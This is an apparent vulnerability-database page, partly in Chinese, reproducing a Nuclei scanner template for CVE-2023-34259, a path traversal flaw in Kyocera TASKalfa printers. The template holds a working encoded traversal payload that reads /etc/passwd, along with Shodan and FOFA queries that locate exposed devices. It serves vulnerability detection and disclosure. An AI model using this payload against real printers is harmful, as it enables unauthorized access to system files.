CVE-2023-34259: Kyocera TASKalfa printer - Path Traversal

日期: 2025-08-01 | 影响软件: Kyocera TASKalfa printer | POC: 已公开

漏洞描述

CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.

PoC代码[已公开]

id: CVE-2023-34259

info:
  name: Kyocera TASKalfa printer - Path Traversal
  author: gy741
  severity: medium
  description: |
    CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/
    - https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html
    - https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html
    - https://sec-consult.com/vulnerability-lab/
    - https://seclists.org/fulldisclosure/2023/Jul/15
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.9
    cve-id: CVE-2023-34259
    cwe-id: CWE-22
    epss-score: 0.93101
    epss-percentile: 0.9978
    cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: kyocera
    product: d-copia253mf_plus_firmware
    shodan-query: http.favicon.hash:-50306417
    fofa-query: icon_hash=-50306417
  tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer

http:
  - method: GET
    path:
      - "{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"

      - type: word
        part: server
        words:
          - "KM-MFP"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100afd841212a9932528fdaf23f5804ecaabff429625a6ec05f8df95c0a333522450220279d37d5d67ef2d2c212ad52e9f71bfb5de0cc1daa4ad154048566bc8901907e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-34259.yaml